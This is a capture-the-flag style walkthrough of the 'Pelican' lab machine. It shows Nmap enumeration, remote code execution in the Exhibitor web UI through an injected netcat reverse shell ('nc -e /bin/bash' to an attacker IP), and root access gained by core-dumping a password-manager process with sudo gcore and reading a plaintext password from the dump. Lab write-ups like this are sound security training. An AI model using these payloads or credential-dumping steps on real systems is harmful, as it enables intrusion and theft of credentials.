Pelican
Gaining Access
Nmap scan:
$ nmap -p- --min-rate 4000 192.168.219.98
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-05 10:56 +08
Nmap scan report for 192.168.219.98
Host is up (0.17s latency).
Not shown: 65526 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
631/tcp open ipp
2181/tcp open eforward
2222/tcp open EtherNetIP-1
8080/tcp open http-proxy
8081/tcp open blackice-icecap
41665/tcp open unknown
Ran a detailed nmap
scan as well:
$ sudo nmap -p 22,139,445,631,2181,222,8080,8081 -sC -sV --min-rate 4000 192.168.219.98
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-05 10:57 +08
Nmap scan report for 192.168.219.98
Host is up (0.17s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 a8e16068bef58e707054b427ee9a7e7f (RSA)
| 256 bb999a453f350bb349e6cf1149878d94 (ECDSA)
|_ 256 f2ebfc45d7e9807766a39353de00579c (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
222/tcp closed rsh-spx
445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
631/tcp open ipp CUPS 2.2
|_http-title: Forbidden - CUPS v2.2.10
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/2.2 IPP/2.1
2181/tcp open zookeeper Zookeeper 3.4.6-1569965 (Built on 02/20/2014)
8080/tcp open http Jetty 1.0
|_http-server-header: Jetty(1.0)
|_http-title: Error 404 Not Found
8081/tcp open http nginx 1.14.2
|_http-title: Did not follow redirect to http://192.168.219.98:8080/exhibitor/v1/ui/index.html
There's a ZooKeeper software, but there aren't any exploits for it. Port 8081 had an Exhibitor software being used, and there are RCE exploits for this:
$ searchsploit exhibitor
----------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------- ---------------------------------
Exhibitor Web UI 1.7.1 - Remote Code Execution | java/webapps/48654.txt
----------------------------------------------------------- ---------------------------------
Exhibitor RCE
The Exhibitor RCE is rather simple, and the Config tab looks rather vulnerable.

The java.env
script part seems to be running bash
. I downloaded the exploit found from searchsploit
, and attempted their POC:
$(nc -e /bin/bash 192.168.45.182 4444)

Afterwards, committing the changes would give us a reverse shell:

Privilege Escalation
Sudo Gcore -> Root Creds
The current user has some sudo
privileges:
charles@pelican:/opt/zookeeper$ sudo -l
Matching Defaults entries for charles on pelican:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User charles may run the following commands on pelican:
(ALL) NOPASSWD: /usr/bin/gcore
gcore
is a program that is used to create core dumps of running processes, and since we can use sudo
with it, we essentially can create these dumps of any processes. As such, let's enumerate what root
is running:
charles@pelican:/opt/zookeeper$ ps -ef | grep root
<TRUNCATED>
root 510 459 0 22:53 ? 00:00:00 /bin/sh -c while true; do chown -R charles:charles /opt/zookeeper && chown -R charles:charles /opt/exhibitor && sleep 1; done
avahi 522 456 0 22:53 ? 00:00:00 avahi-daemon: chroot helper
root 527 1 0 22:53 ? 00:00:00 /usr/bin/password-store
<TRUNCATED>
There's a password-store
binary being run, which is essentially a password manager. We can create a core dump for this process:
charles@pelican:/opt/zookeeper$ sudo /usr/bin/gcore 527
0x00007f31c88806f4 in __GI___nanosleep (requested_time=requested_time@entry=0x7fffe1091db0, remaining=remaining@entry=0x7fffe1091db0) at ../sysdeps/unix/sysv/linux/nanosleep.c:28
28 ../sysdeps/unix/sysv/linux/nanosleep.c: No such file or directory.
Saved corefile core.527
We can then use strings
on the core dump file to find a password:
charles@pelican:/opt/zookeeper$ strings core.527
<TRUNCATED>
001 Password: root:
ClogKingpinInning731
x86_64
/usr/bin/password-store
<TRUNCATED>
Using this password, we can su
to root
:

Last updated